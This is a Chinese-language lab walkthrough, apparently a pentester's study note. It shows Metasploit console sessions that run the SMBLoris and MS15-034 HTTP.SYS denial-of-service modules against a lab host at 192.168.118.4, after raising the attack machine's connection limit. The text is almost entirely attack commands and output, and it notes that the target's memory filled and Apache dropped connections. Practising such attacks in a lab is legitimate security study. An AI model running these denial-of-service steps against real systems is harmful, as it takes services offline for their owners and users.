- 在进行 SMBloris拒绝服务攻击之前,要先设置攻击机的最大连接数。
┌──(root💀z)-[~]
└─# ulimit -n 65535
┌──(root💀z)-[~]
└─# ulimit -n
65535
- 使用smb_loris模块来攻击目标机器
msf6 > search dos/smb/smb
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/smb/smb_loris 2017-06-29 normal No SMBLoris NBSS Denial of Service
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/dos/smb/smb_loris
msf6 > use auxiliary/dos/smb/smb_loris
msf6 auxiliary(dos/smb/smb_loris) > set rhost 192.168.118.4
rhost => 192.168.118.4
msf6 auxiliary(dos/smb/smb_loris) > run
内存被占满,apache断开连接。
- MS15-034 HTTP 协议栈请求处理拒绝服务攻击
msf6 > search ms15_034
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/http/ms15_034_ulonglongadd normal Yes MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
1 auxiliary/scanner/http/ms15_034_http_sys_memory_dump normal Yes MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
msf6 > use auxiliary/dos/http/ms15_034_ulonglongadd
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.118.4
rhosts => 192.168.118.4
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run